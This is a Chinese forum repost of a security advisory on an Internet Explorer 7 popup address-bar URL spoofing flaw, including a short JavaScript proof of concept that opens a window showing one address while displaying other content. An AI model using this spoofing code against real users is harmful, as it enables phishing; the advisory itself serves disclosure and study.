• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    IE7弹出窗口地址栏URI欺骗漏洞

    发布者: 404号房间 | 发布时间: 2025-6-28 22:55| 查看数: 123| 评论数: 0|帖子模式

    受影响系统:
      Microsoft Internet Explorer 7.0  描述:  BUGTRAQ ID: 28498  Internet Explorer是微软发布的非常流行的WEB浏览器。  如果用户用IE访问了恶意网页的话,则弹出窗口的地址栏可能为任意地址而窗口主题中为任意页面或内容。这有助于攻击者执行网络钓鱼攻击。  <*来源:Juan Pablo Lopez Yacubian (jplopezy@gmail.com)  链接:http://marc.info/?l=bugtraq&m=120673515616258&w=2  *>  测试方法:  警 告  以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<script language="JavaScript">
    function iniciar()
    {nuevaventana = window.open("", "Win", "width=500,height=500,location=1");nuevaventana.document.location = "http://www.google.com.ar/#"    "www.microsoft.com/";}
    iniciar()
    </script>

      建议:  目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:  http://www.microsoft.com/windows/ie/default.asp


    来源:https://www.jb51.net/hack/5394.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    浏览过的版块

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表